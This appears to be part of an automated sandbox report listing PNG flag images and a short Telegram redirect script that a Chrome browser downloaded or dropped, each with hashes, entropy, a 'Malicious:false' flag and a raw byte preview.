                                  SSDEEP:96:ZY5liNEc3IYSUf3qVwLf9RdO8Ctdrt/+MR0z3klDl:ZY5liqc35dqVY97jCXwMmzklx
                                  MD5:B202A85B77803EB79DBA4B7B43DB2C02
                                  SHA1:E520DF3DBDBE37E1A38A9FEF5E4906AD9B07DE89
                                  SHA-256:0A306AFED8B4A0BF439894949EE6A0FC4AD4FD920ABE476FC21C0234C6BF1AE9
                                  SHA-512:406BB50C98748502FFEF510F9B01EBF590A77CF7318E97FCFB79DB3C02871978D2C2D5FB324259A832420F554938171F8A7BDADAA4CA66D312B08534D7A5EFD8
                                  Malicious:false
                                  Reputation:low
                                  Preview:.PNG........IHDR.....................PLTEGpLLq.Lr.Ou.X..b..h..m..n..n..o..p..q..r..s..s..t..u..w..w..w..y..z..{..{..|..}..~.....................................................................................................................x...........................................................................................................................................................................}..w..s..p..q..q..t..v..}..|..y..u..i..l..n..c..W~.Ty.Os.Mp~KlzHhuEcpA_l>\h<Yf?]iIdoC`mB^j@]i@]iC`lB_kA^kC_lC`lRr.Xy....u.....w..k..z......a...*_O!j_1.w._..Y..\g^ONF/#.51/H<4/B&6U2.M.+]).>.DgB.!.}.zj.]u.\.t....@.$j.93q.............d.a{.yszpdu[RyG%g...................v..............................................c......~.........~..|..w..m..c..a..c....Y.....tRNS.~...............................................:d................jU7%...o>....................................................................................Icx......cX.....
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:PNG image data, 160 x 160, 8-bit colormap, non-interlaced
                                  Category:dropped
                                  Size (bytes):3572
                                  Entropy (8bit):7.873139104664729
                                  Encrypted:false
                                  SSDEEP:48:hO0e4IziGg7Dl8oOfP2lpqSrE9dxQtCQfRHeiIvihcuhLM0eES4uGRt4GGJVFgPM:w0kBg3l8ffOlpmvL23laNG0NAx3Mhuar
                                  MD5:DD8AAED25D1771472F89334305696D2A
                                  SHA1:3D5661BD3EBB16C8048E2B66364F4730944FADDB
                                  SHA-256:173B1545814F9FCE55BBDB6473AAF20B3D914128CE5946D0234A2CEC9D97B55F
                                  SHA-512:40EAA039E5AAF7D12B83B7395069BC1164AF29E168A7701E72D80FB423A4195098453A918A0D10258030F5EB528F5AC712EEB199AC762D7911423DFCF0815011
                                  Malicious:false
                                  Reputation:low
                                  Preview:.PNG........IHDR.....................PLTEGpLe.ux......I1k...E.`.~p...A*l...D+...a......E....b..E.h3y].A*.dE.Y=....?'...d..P.s....@(b...L/.cI......b...B*...<x_f...@(...].}....E-...g...B*...`...E-......e......D-.../nU........^.}.@)..............................................................................................................................................................j.....e....._.....[.}>.z\.{=.xK.w=.wP.wU.wG.rP.r@.q0.oC.n/.l4.kE.l3.i6.h..c).e6.d..b=~d..a*.a..`.._.._.._..^..^..]..\&.]..\..\*~]..[..[..Z5v\..Z#~Z..X..Y..X..X..W..W..W..W..W..U,uX..U..T.{V..T..U..T.~T.}S..S..S..S.wT.~R..R%rT.zR.~Q+nS.}Q.|P.}P.vQ.|O.{N.xO.zN.zM.yL.xL.uL.wK.wJ.qK.vJ.mK.uI.vI.kJ.tH.sH.tF.oH.sG.rG.rE.qF.pE.qE.fF.pD.oC.dD.nC.cD.lB.bC.eA.i@.g?.^@._=.b;.`;.Z;.V<.]9.R8.Y6.W5.S4.O4.L2.O0.I0.L..J-.F-.D*.A(.=%j......wtRNS......."&,47:<?FSUUUTccddghnyx.~.........................................................................................q....,IDATx...M..D.....*W..zF.A .9._K...8...0l..[..b.I..
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:PNG image data, 160 x 160, 8-bit colormap, non-interlaced
                                  Category:downloaded
                                  Size (bytes):3506
                                  Entropy (8bit):7.874713139023375
                                  Encrypted:false
                                  SSDEEP:96:SAVVsLqkQQWrLjRML53SM5qd3o3d3Yo0K1BdmKbf:vlzrL9ML9SM83o3WTK1j1
                                  MD5:FD1CBD965F0480D1187EC9153753C115
                                  SHA1:C9ACFDDF4888996DF5A4F3C929011C8A0E9C35A4
                                  SHA-256:0F2AFAFF9323AC0033F872C217869B06E2B2467569F0340699B8010761EB115C
                                  SHA-512:B94B92BC6D878B0020EC4DECE2B1B913D194088F23567C69E89FFBC330136E84D548EA71F3F7C10441A0C3E64E5753E33DE501AF991EAE477A225EA2C37AF578
                                  Malicious:false
                                  Reputation:low
                                  URL:https://wkybcnfuqpgjx.ltd/img-apple-160/1f1ec-1f1f3.png
                                  Preview:.PNG........IHDR.....................PLTEGpL.gM.|8A1m...qR.uZ8?0.}j...q1.|6?.f...mV.Y@p..#rT.}2.a.G0.o%j......R;.<?k...su.p$r...}.K4.p%.tvp..i...|q...o%.tv.S;.{q...p%h...sv.|.N7.\`.o$j......Q9.DG..J..I..I..I..C..I..H..G..I..B..G..I..@..H..E..D..N..H..G..?..C..G..U..B..G..F..B..?..A..\..C..M..B..A..W..b..@..B..?..f..?..i..B.m.z.?.s.<.;.9.6..4..1m...vxP.vf..X..N.s....oqU..G..]....-.fi.jm3.{Q.}<.z.VN2.z.\_.df0.xE.yQ.z.~*.NE/.w#...RV,.u-.u.LD9.u.\_".~*.sE.t*.r.QU/.s.w((.p.HM.SW3.p&.n8.n.GK.>C#.l.=B.AE&.k.q%".j.SV.<A&.j.<A.HL.;@$.i .h'.h!.h.:?.9>+.h.:?..f.4D.8>..f.=B.7<.7<'.e..e8.d..d.5;.6;..d..c%.c.7<.>A..b.49..a.38..`.._.27.16!._..^..]./4.49..\..\&~]..\..3..[..[..3.,1..Z.,1.+0..3.*/.*/.|V.04.(-#tV.',.).#rT.&+.56.$).tP.'+.mM.(-.!&.+.. $.hG.dH. $.#(.^C..!.!%.X>.!#..........O6v.!y...I1o....U....mtRNS......*.77=EFV[aacdghmp~......................................................................................m.v....IDATx....j.V.....#.G..s1I.......m....w...G.o.M.....4%$.q
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:ASCII text
                                  Category:downloaded
                                  Size (bytes):325
                                  Entropy (8bit):4.7974641880851365
                                  Encrypted:false
                                  SSDEEP:6:P46F+mmzQz9AmmNQg0OntoMhens3XhIKtgelEoiIg2mmLn:P468mmztx6g0C/Us3XuhelEoE2xL
                                  MD5:17773B57B87A678C98E26A7CAC72DF6C
                                  SHA1:7422857AA75EE81CABCEC2EED6C4A6168F363EE1
                                  SHA-256:375141F2D3F04C733276DBFF5D9208FF36B2DB6A64ABCEE723179AC24797974F
                                  SHA-512:28D9E1C2AF08154E653E2291DB46F4110EDBF9F5591192F8D695C8852F9C3C755D69DFB5A032A45F51E0A3FC9417F16C20D0772B1225CA9B85E5531E12FA8BFC
                                  Malicious:false
                                  Reputation:low
                                  URL:https://wkybcnfuqpgjx.ltd/redirect.js
                                  Preview:const { pathname, hostname, href } = window.location;..if (pathname.startsWith('/z')) {. window.location.href = href.replace('/z', '/a');.}..if (. (hostname === 'weba.telegram.org' || hostname === 'webz.telegram.org') && !localStorage.getItem('tt-global-state').) {. window.location.href = 'https://web.telegram.org/a';.}.
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:PNG image data, 160 x 160, 8-bit colormap, non-interlaced
                                  Category:downloaded
                                  Size (bytes):3415
                                  Entropy (8bit):7.8833961816045885
                                  Encrypted:false
                                  SSDEEP:96:GRWehP0FDMpUDHuiOk4qgheSFfu2fzW48:gPUDMOz7gheSFbV8
                                  MD5:E2F164E9A96FC8A8AE52F2496DFE5E46
                                  SHA1:49478F05FA70B7C5A8E79C417D6757CF373618B6
                                  SHA-256:ADA85F2307C115321CCAF830F498D6993A2128D11CBA19EE8ED227218E34F196
                                  SHA-512:A080F48B716F8ADA7A5BA355FC2644BD2992FBEA8C5C90C1FE4A35F482390362827538FCCBDA0D721520E5E354427320D5BD035082909E03C5B1EBF66CB3A207
                                  Malicious:false
                                  Reputation:low
                                  URL:https://wkybcnfuqpgjx.ltd/img-apple-160/1f1f2-1f1f1.png
                                  Preview:.PNG........IHDR.....................PLTEGpL.V0..w..wS...yYul,c..k.yC3..g].uh.{wl.b...[!b.q.fe..+.ur.s.U..p..hph...g!.[ j.y4.G.u.p..W.b...fmj.x.r..X!a...u.V l.z.t.W .o..isi..k.y.p.8.K.X!.ti.wa...bj.o.\.k..4..3..M..8..8..7..6..7..7..5..7..*..6..4..*..6..3..:..5..2..?..,..F..5..2../..4..0..N..1..=..1..I..U..1..[..0..`.s.e./.m.f...,.*..Y..o..M|.Ay.?.j..'.Rk.z.{;`....%f.u_.qQ.g\.m..#.mu>.ZM.b,.L.k4R.c..!=.V*.J.gn).I(.H,.KE.V'.G&.F.bk%.E(.G.|.#.C%.D".B+.H.\e..R!.AJ.Q2.K .@.S`".A..?..P..>.v..W^..=..<..:.HV.q.".>..9..8.MW..69.L..6..5..5.;L..4..3..9.FP.@L..2..1!.:..0../..?.1C.>I.,=.4B.,<..-.*;.):..1$}4.'8.1?.%6..+.%6.G".(7."3Bg".!2. 1..0..C."1.u,./:....y'../.!1../..,."1..+..-..+.o).!/..*..(..'..).!...&..&.j"..$..#.g!..'..*.d#.."..*..,..".. ..*.^$........%....Z .....%.T....w."...j..s..d..].........xtRNS......! %049;CIRWXcdfimyz~~.............................................................................................i.......IDATx.....V........nH..J.....PJ`."....;.+y..B.0
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:PNG image data, 160 x 160, 8-bit colormap, non-interlaced
                                  Category:downloaded
                                  Size (bytes):5112
                                  Entropy (8bit):7.82093622729016
                                  Encrypted:false
                                  SSDEEP:96:5yWihsTBR1geRxNeQdXhFTxiFtO+4sHzA:5yWiCBR1xZXh/g4sHzA
                                  MD5:AEDE2CD4321E411ABA2EB1FA94E37FB5
                                  SHA1:2C61170535BCB096CEF2DF3C9A1FB796BE377A6C
                                  SHA-256:1B948DBE243C0FAE2AC95E62EBBAFE3C5CF4DB076CE2F1F2CEBD5984726E92E5
                                  SHA-512:B415900E786353B4ABF1EC456FA6DBEC7C01715470E54509ACE0AD8DA7C0252C1478F66F643C6927FE5F2C10C53837D03AC81AF07F8E719E6A055E8EBCCD6F68
                                  Malicious:false
                                  Reputation:low
                                  URL:https://wkybcnfuqpgjx.ltd/img-apple-160/1f1f2-1f1f6.png
                                  Preview:.PNG........IHDR.....................PLTEGpL......................!#.&(.,-./1.-/..0.(*.!$......e%&.&'.56.86V<<8@=r99.81....(*.)*.&&....$.............|..e..e...........A.g^.}^.~^.~`..W.yq..G.lH.kJ.nW.yZ.{Y.zO.rR.tV.vb..c..R.s0.V..EO.syu[.HH.;;.HD.qQ.::.12.34.24.24.35.13..0.*,.&)."%.. ...................................................c78CCCAAA@@@???>>>===<<<;;;:::999888666444111///---,,,*))'''$$$""".....................................................................!""...+++&&&'.....H..r..&..D33.<&.U,.d.#pA..7..8..8..9..:..;..<..>..?..B..B..E..F..J..M..Q..U#.Z&.Z".W..S5.e>.i?.h._Kd.f.KIj.X+.`+._,.^,.]0.`2.b3.c2.b1.c1.c3.e3.e..fP.a;.a1.]8SCEkA7.J..H..E..CxR)'.R..X5.]5.[/.V-.R..F&.Q..<..A..H..J..J..M..P!.T&.X).Z/.]<.eC.iF.lG.nO.tW.yY.|b..e..e..]..T.|J.vA.o9.j9.hJ.sV.|..................................nV....tRNS...........................................g........'IuS:....DM..\......................................................................v...a:(QX..................................
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:PNG image data, 160 x 160, 8-bit colormap, non-interlaced
                                  Category:downloaded
                                  Size (bytes):6640
                                  Entropy (8bit):7.948528564705358
                                  Encrypted:false
                                  SSDEEP:192:b11/Nw1tOM8hPTlj/KMt2HFVIAcn/SDHlrUB:bDQtSt12z6n/qUB
                                  MD5:0040734AA31EDCC366B505E5C2365C19
                                  SHA1:E6912D889B546260FFE803A1E043EB475B909E87
                                  SHA-256:FF1A55481357A6A8BBBD27DFA5D66978124E36F50FB7402F52030D0645FF9558
                                  SHA-512:28C2930B6958E2323A347D8BE1A1D142D2EA244060C6BB5216C80E46B78B943DBEFCCCE243666677FF6DF7A9EBAB4F0CD422E91EB1E0F5675F1D667B371327F7
                                  Malicious:false
                                  Reputation:low
                                  URL:https://wkybcnfuqpgjx.ltd/img-apple-160/1f1e7-1f1ff.png
                                  Preview:.PNG........IHDR.....................PLTEGpL.9c.#L.bj.lt.qyy.&.lt.jrn..f...=O.mum. g...nv.pxf..h..f...jqd..i..b...gog...em.4=....4o.B~.4q.:v.7t.<x.H..?{.7r.F..@}.5r.8t.C..=z.L..>{.;v.A~.J..E..K..O..I..S..N..5p.Q..;y.D..G..:c.3m%Y."V.....Cv`...>m.E}.1h.9v.#K.-a.%P.*Y....D}r.%...m. .B..Zc....foZ+..lt....=..9b..*e0..LYg:....X.....o..}.$.#/.z.f......5{.a.t6$.aj.\e...."+.......X.......?E.......... *n*..Q^<......IT...:...IQ....U`.q....@k....*......R..19.=G...y...LV5.#nmp5b...*[..?K./={P>.veI.'...1.:Ai"YqE...xz~...Rx.e.ZN.M.1DnD)N.?)g.a..<..{bP..rKZ#+Y....3v..V`...x7T......Ol....#.f.R2)..3,U[*I\N(u.vu.n.....o.a...IH....H.$WVTs......K...}...hP}.......{.-Gw..M+L.O.H...`A`...wsNv-+e51...<8...?B9aB..;M{G@>..V^7[M[.g.d........Y.=lmZ.H"E.?1...KHo.C._&.a)G@i.1a.JC....B4.O&%,4..2m..kLq.....l\Q{.7"..*.v..,......tRNS.c~...Y].}8....:.g."....r.(..tk{....IDATx...]LSg..q7......C....(..~H.S..d.v.J][X..+n..V.i.U @..B.`......?.&~ ...S..B..../.w.].y.9...Jps^.?\@o....9....................8.06...
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:PNG image data, 160 x 160, 8-bit colormap, non-interlaced
                                  Category:dropped
                                  Size (bytes):3590
                                  Entropy (8bit):7.868367047443332
                                  Encrypted:false
                                  SSDEEP:96:ItbdQXa9Nzku6aRfDrfBJaJO0chA5CGcxcHVwyqI+n:gb+2zNDrfBJa0Ph4hq3n
                                  MD5:F4B6855F4229AC61CD68DB10F8F7E817
                                  SHA1:840410F98FC143E29F8DEF225C069DE522359D99
                                  SHA-256:3D9B2C0477BC7B4815DD11D68C0A5044FD327F6AED2139C35FB16D17B66F72B6
                                  SHA-512:DDEC78B5C0A79A5BA1147D2C29D8B351F4520F206BCD128F0ACCEB28E5E46DDD2AF60505BA3FD327A6A2F2E4BAF0631476AA06CA66D3C95C2BBACC71C11D3783
                                  Malicious:false
                                  Reputation:low
                                  Preview:.PNG........IHDR.....................PLTEGpLyi+kdJl_2uf1p^.ggg.j.we%XXXxa.......z......q.iii***PPP{d..t.bbb.>....V........t^..k.gggq[.lll<<<eeev`..m.dddRRRyc.iiiv_..m.___kkk.k.kkku^.]]].m...%..#..$..%.....&..%..$..$..$..#.."..!...........%..............!................ .... .............#............................................."......................v .............`!.u..............]..}..B!.O..x..x..t..q..p.jjj./..m..D..&&.%%.T..i.eee.#$.##."". |e.aaa.......0.^^^..%...xa....[[[."........&"...s\.XXX....."...SSS....'................OOO....&!............KKK........................FFF............BBB...." ...............<<<......777`##...r..222...---...D!!6&&***'''r..&&&%%%Z..$$$.%%""" 5......%%.........H....................0......................................Nc_....1tRNS....$.89IW^ccccfflnu~.~~~~.......................QjL^....IDATx.....iV...9.KeU..bkz4h....w...H.`..A.!....b1..!...a.....[.Hh....i..kFd.w.#3TY.t]lW......2.?./..-3555555555555
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:PNG image data, 160 x 160, 8-bit colormap, non-interlaced
                                  Category:downloaded
                                  Size (bytes):3611
                                  Entropy (8bit):7.863914536864181
                                  Encrypted:false
                                  SSDEEP:96:cfpi9dypZoL360POqTXORGcoYRolpynVOn75SQ:cfAYoL360/7tigAVO75h
                                  MD5:1E4AA7070373715C56F90B4739147826
                                  SHA1:DF0CB2272ABCD4C3BE4E17DE3A7FA0BF6421D457
                                  SHA-256:17B1FFB17AE948482CDFE8030757717D75C5158D9394B17DE2A35FFB7C9DE3AE
                                  SHA-512:28BA7B99271BF69D16D165DECFC09DEAEF2EFFC4A83ABAF41170B62A74CA92589F4F5EA5E25FF68ED7DF07694F3CF180371A43E1E126A411C9A57038AFB9D1A4
                                  Malicious:false
                                  Reputation:low
                                  URL:https://wkybcnfuqpgjx.ltd/img-apple-160/1f1e8-1f1ee.png
                                  Preview:.PNG........IHDR.....................PLTEGpLz.m....TGI!q...N2..wDF...b...r..(J*y...{E3.eb...._s=..qM....Q4...`......N2.G..`........de...L0u>..u<....cZ......K/...u@.....c...a..t?..E+.W;...d......O3s=......a.L0....j,j..\......................................................................................................................................0....1.a....T.8...).F.............U...*...4....}.W...~..}..>.|..~ .{..{......I.z..y..y..x.>...}4.w.>...z&^...v..u..t.<......u..s..q..s..p.J.}.o..o..v<.n..m..m.S.{.l..o".k..j.4.uC.v.j..g..f.E.s..n.g.4.p..m.b...k6.m..j.a...i$.h..h..g._...f6.g.\...c..d'.f..c.\...a..`..`.._..^..^..^..\..].T...[..[..[.T...Z..Y..Z!.[..X..W..V..V..V.P...T..S..R.}T..R..Q.K..K...P..P..O..O..N.H..G..{L.vL.rM.G..pL.C.zC.}A..qExA..jDv=..d@p:..]=.W9.X6.R5.M/.H+V_......tRNS......!&19::IQUU^`acddgxyy~..............................................................................................................d..^...AIDATx...An.U........$NR....[....
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:PNG image data, 160 x 160, 8-bit colormap, non-interlaced
                                  Category:downloaded
                                  Size (bytes):4933
                                  Entropy (8bit):7.882757533764038
                                  Encrypted:false
                                  SSDEEP:96:WAgNksJo/XtJu0V/Sd3Y9pRxK5nhuuWfsPMiUsBrkvTITP9vDi3:G64oftJNg3Y7RxEnEunUi9rgITPE3
                                  MD5:381ED0151948B41C0E3E054C3FA7B9B4
                                  SHA1:3BC93DD2E490E033D2175310EE99E461CC392738
                                  SHA-256:9AF0C1DEEBBA27E6C7A711E03B568DFD40A957AD87A7E4709BB6695E2CC5923F
                                  SHA-512:01DBE96F587B9158FC13941DEA0B141741914165610B056072A2A3C7F5E12A319B53A6D4EF5F3FA97DE560D4DAD45D656FD9222B644D05AD71CF9EE6C09E37BB
                                  Malicious:false
                                  Reputation:low
                                  URL:https://wkybcnfuqpgjx.ltd/img-apple-160/1f1f9-1f1ec.png
                                  Preview:.PNG........IHDR.....................PLTEGpL:SKv..5?9Y.y.:..ao.:.z...:-e...ds\q7....RB].|.9,h...ft.;,.v...&x..y...iw.3E.:-l..`.~.:..lz.</.iwl...9,\.{.5).A4.jxl...<0.3'.sn.8I......................................... ..&..%.....%.....$..".....!..........*.......................................1....................7..............;...........?......v..{6.....E...q.Li...dw..... .hvb...i#_.Q.WlY.~.`o[.z.Me.YjM.zr.&.x.J.Y.OcC.uQ.s.Td.F^?.].J,9.p.<TD}nZ~..H[.@W1.lAxiH};.IZ,.h.4F&.h;{H. H/{c.5O.,K$~f}SW$}f.8O$|e6sc.*I"{c.*G.(G..g!zbxPV@s2.'E.zj.x` w`.+E..d.%C.#CSf##s].u^."A.L.%o[.vm&qJ.s\.#@..>.qZ.'>mC^ kW.oW.ro..;.pd..P.lU$h<..8.jS..4.fQ.hQ..5.aO.je.bN.fN..B..2.cL.d\../.\J.#2.aJ.YH._G.`I..+..-..(.VD.]U..+.]F.ZD.SB.[D..7..).YB.UO.N>.VA.....&.R>.OJ.I:.O;..#.D7.K9.A4.E3|..x...>0.;,.6).1%.G0.....tRNS.... !"68MO[_ccdgls}~~~~.................................................................................................................]......kIDATx...[.$.}...9.....3...k..7...
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:PNG image data, 160 x 160, 8-bit colormap, non-interlaced
                                  Category:dropped
                                  Size (bytes):4119
                                  Entropy (8bit):7.91669029429467
                                  Encrypted:false
                                  SSDEEP:96:M7B/YYpmtUdwhuDqIhLIUg7aduvcDBB5pI5DlI/R9oINvbz:SpYXJu22oEDzcxlIZ9om
                                  MD5:F5FC140F04FBEFDCBB5CB52842D2136E
                                  SHA1:AB671CFF1FEA56FC3578C6D45A01BD0F4FD84646
                                  SHA-256:D8CBE0CB59DB8F82214D60177E7C61DB92394CF0BE545B62DFA6762028A803E3
                                  SHA-512:2D6D5BCA5AD897EDA2078D4BC05C0DEFCCBAF7D7F97313E577CBDDC8361C042B47409205A376393994D5E6A5BBCA419FB5CF14DA65CCE18B7046D9FB0225A7A5
                                  Malicious:false
                                  Reputation:low
                                  Preview:.PNG........IHDR.....................PLTEGpL5Q]....=Qf...3O`{..3N.sf...m..2O\...s..".Jn.>\i...p .-JPw.c......x..F[.3Uc...3O.l..ui..<d..2M|k.d..Rv.Rz..3N~k.j...q.3O_...n.i...5Ql..]...;W.-H.)E.qZ^.+[r..(...../..9..-..8.....6..,..6..5.....5..3..2.....1..0..3../..=.....2..-..-........,.....?..)..M..-..'.....%..U.."..".^.......)...g.....=...&..Z.<.......).....5.%....c...)..:....%..o..O.....2..u.."..Lk.....e..a....#^..g.qz.I^..T...}.[..I..T|..w.F..Qx.>|..q.Dx._wQ5y.7y.Er.}k./u.8r.Grh&s.8n.&s.%r.%r.%q.)o.$p.8k.#o.,l.$n..o.!n. l.#j.+g..j..j..h. f.1ct(c..f..g..e. b..d..e..c..b.._..a..`..`.._.._..^..]..[..\..X~.[..X..Y..X..Y..X..X..W..W..V..Qv.Rz.T..U..T..Qz.S..S..S..Mq.R..R..Q..M..P..Jm.O..M|.M..N..M..M..Gi.Ir.L..K~.J{.H..Dc.E..Gv.@..@a.Cp.Al.=Y.={.=e.9V.;c.9].6S.6Y.3V..j.0N.+Gl.....6tRNS.....!%357=KTcccceffnx~~~~.............................MiT....IDATx...M.c.y...y.s_t%UU.t.3.L....o.....2d.1.x.!...d...........Y.$x.B !. ....Y8....tO._..Jo....wIB...J..]=...F ..
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:PNG image data, 160 x 160, 8-bit colormap, non-interlaced
                                  Category:dropped
                                  Size (bytes):4177
                                  Entropy (8bit):7.875406155849178
                                  Encrypted:false
                                  SSDEEP:96:roSqiakg5FTcz4Jx23u+snLp9eKVu78/iy4bktARfioNSd:rohiakUt32R0p9hdmbk0fsd
                                  MD5:4A1D22D5DC7F89A422E28E82CB9BED35
                                  SHA1:1C1A4E24C78159D3BCB0326270C38649D06BC4EC
                                  SHA-256:E514F8DB8364DE6D7110E16BAA7DBC45E59F48D1400BB0B95C8FB0F6C4EDC280
                                  SHA-512:B745F5F732A762A63DE9DCB00D2C5D1B3E79E2AB76226AC40F50FFB507697637F0789E04D7F2E682E300F3DE034F6EF2A7376A6BFBD660727AB513863973CF45
                                  Malicious:false
                                  Reputation:low
                                  Preview:.PNG........IHDR.....................PLTEGpLqDIJ...mrG...djE...otG..K...im...a"*E...rvL...fkF........K..c)0.jopFK.uy.joF...puG...kp.Z`G...rwA...hlH...lqI...sw.tx.ekL. ?..s?E............................................................................................................................................................................}..px.w{.rw.go.ot.kp.ai.gm.hm.bh.di.Xa.^e.^d.Y`.U].Z`.OY.U].PY.V[.LU.QW.HQ.MT.BL.FN.BK~HN.=G.BI.8C.8C.8B.9D.7B.7B.7B.7A.6@.6A.;D.5@.4?.4?.5?.3>.2=.7@.4>.2=.0;.1<.0;./:..9.1;.4=w8?.-8.-8.,7.*6./8.+6.*4.+5.&2}-6.(3.'2.&1.#/.%0}(2v+4.%0.$/..+}$.."-."-z$.~"-.!,v%.p'0~ +..'i(/{.*}.)..(w *|.(z.(l#+z.'o )w.'z.%d$+..#w.%w.#r.%b!)u.#|. r."v.!s.!s.!c.%r. i."p. {..Y.&r..p..p..o..l..n..b. n..u..m..P.#g..W..]..a..l..L..p..[..T..L..X..F..j..O..I..L..J..d..A..B..=..R....@....}tRNS.....%*8;NTccceluw~~~................................................................................................................IDATx......].....i...x7.....H.. ....!.rAp.
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:PNG image data, 160 x 160, 8-bit colormap, non-interlaced
                                  Category:dropped
                                  Size (bytes):4018
                                  Entropy (8bit):7.742967446726215
                                  Encrypted:false
                                  SSDEEP:96:Kz9b+PdMyyo/xMLfC8HZLCHIatRGJRQQh9bvd/F:EbmdMyyoZMLacLatMpd/F
                                  MD5:5B4A1A93CE9D420ADDC6A29D8C2616E5
                                  SHA1:EBB6503DB590C6FE944FDB16054AE26023CE1536
                                  SHA-256:D9A860B6AB8F98B338FA6768B53FAD600D31498A75E167CE6E609A802689C391
                                  SHA-512:915C4D7E49248316C3C3C714A2F6AAD8252E2C0FE83F8FCAFDF3AE229A5515BB6873058D1AFF9F0752A4620187F91163BA38801692F911A213483DD5C085C933
                                  Malicious:false
                                  Reputation:low
                                  Preview:.PNG........IHDR.....................PLTEGpL.Zz.[|._..k..u..~.......................................................... ..!..$..$..$..%..&........................................77.,-.............y..9..K..d.......................g.................e............. .!".$%.&'.$%.&'.)).*+.,-../.12.56.66.67.23../.00.>>.PQ.EF../.01.23.45.67.89.:;.<=.>?.??.AB.BC.EE.GH.GG.DE.GG.ST.TT.KL.@A.=>.EE.NO.YZ.aa.hh.nn.fg.\\.RS...@...bc.jj.ss.{{.ww.oo.hh.cc.]].TT.MN.II.JJ.JJ.JJ.KK.23.;;.ZZ.ij.{{....!".p..y.................~..q..v.......$..%.. ........o..W............................................................................................................................().-..22...............q..l..g..b..]x.Yt.Uq.Pk.Ke.Qk.Qi.Sn.Sl.Rm.Rk.Un.Vp.Qk.rr.xy.uu.op.jk.yz.ww.}}.ww.{|.wx.uv.mn.oo.DD.YZ.ss.Sm<^s...X....tRNS.}...................................................................~~~~..................c.......................................................................................
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:PNG image data, 160 x 160, 8-bit colormap, non-interlaced
                                  Category:dropped
                                  Size (bytes):4901
                                  Entropy (8bit):7.9188566935003015
                                  Encrypted:false
                                  SSDEEP:96:jo/3q9yFo1VFfeWAXqKWjxaEbIVP5joOQX82y2Wfj/UpOnBJLCc8HR1j9u:jo/3H6VFfrAXqjsEb6xkZ8Z2XApCcSn8
                                  MD5:1919C02A1F990B1B7A9273512D7B3E3A
                                  SHA1:9E5E1564F9DE63CE8A6A9CB4DA643141B22E43C7
                                  SHA-256:888CED05E3E686FF29A9E167E5FE8075936D855F9A0EDD3965D19C649E701359
                                  SHA-512:D405374AD879BCA3A585225DF294BCB194EA17CE2ACEF357959911C6D6E55F73070B2251F37094AA2D93ECC25604285C971C0ED218F909A218093109993BE2BD
                                  Malicious:false
                                  Reputation:low
                                  Preview:.PNG........IHDR.....................PLTEGpL.s..g!^^^'RZ#O].....~k.yvg.'NX.Ve.k...Z.ka_V.Mh...t.~-dmw....m.Ztw...VkcaY.Wqv...Ztn.x..$.x.....Pm.Xr.Wq..t...n.xn.{L.Q{h....q.~___.q:.G.Hb....Mgf.p..qyh.&&&.........$$$""".........$........... ..2...>.T..6...(.?.....7......#.9-.D&.=......&../.F2.I#....44.K9.O...$.;..7...*.A......!.8..57.M.r......5...... .....&..$................('&..0.t..k":.R....f!..-.. .Zv>.U......^z........n.z...../......y'..+..1.."F.Z..*Z.k...O.a..#<.S..,....5765..4..1.h...!.. ..6.. %.Y.Kf.m..c.e.rv.......!d.n..C.Sp..8.x...$h.u ......z...$..:.t.C.QAAA.........~..-,.,R.`.........".._.o...SSS......<.Ol.wH.V../W.fR.e...;.M..H.w&..QF..n.....3..!2.DJ.[GGH..T6.@..*$.84-..u-.....=`T!F=.WZY..D..Cr.K....d..)..ENNN........l_(;.@..R..3.....NB..~.&..%M.Z..L(#.D.....>l....0Y....WrG.B...5tRNS.c~..,a8..?S.|.o.d......f..c~..xS..#.........h.x4I......IDATx...}\S.......ee.yofZ.....I.B..T|..|.te..Vz.j...).N..mx.6lP..L1K.$...W(PLR4I3....;.....q..8.Q.....o....k..
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:PNG image data, 160 x 160, 8-bit colormap, non-interlaced
                                  Category:dropped
                                  Size (bytes):3918
                                  Entropy (8bit):7.886558210975162
                                  Encrypted:false
                                  SSDEEP:96:w62kBGV6cHorpPL82baW0cprmwKITBIXWAszt6Ga7Co:Z2kckcCp4kaW/pbKfWACt6Ga3
                                  MD5:59CA130A55E5FA6A09C381C516CD6F37
                                  SHA1:EBF8A6AA91E927B3FD68E3D131F843A7E1EC0E43
                                  SHA-256:7E4B6953D3324AE3C23871ABE7FFDDF5483824C5FFF3825D91136F9E86542B6C
                                  SHA-512:F3C4076423131F889AF1CC0431F5DE234AF3735CF14DCAC3D6590C2F098C723A5E08B196DB6EA545543BF903B90D41431EEBEA544D28AD15FAF5CF1A5CC680A1
                                  Malicious:false
                                  Reputation:low
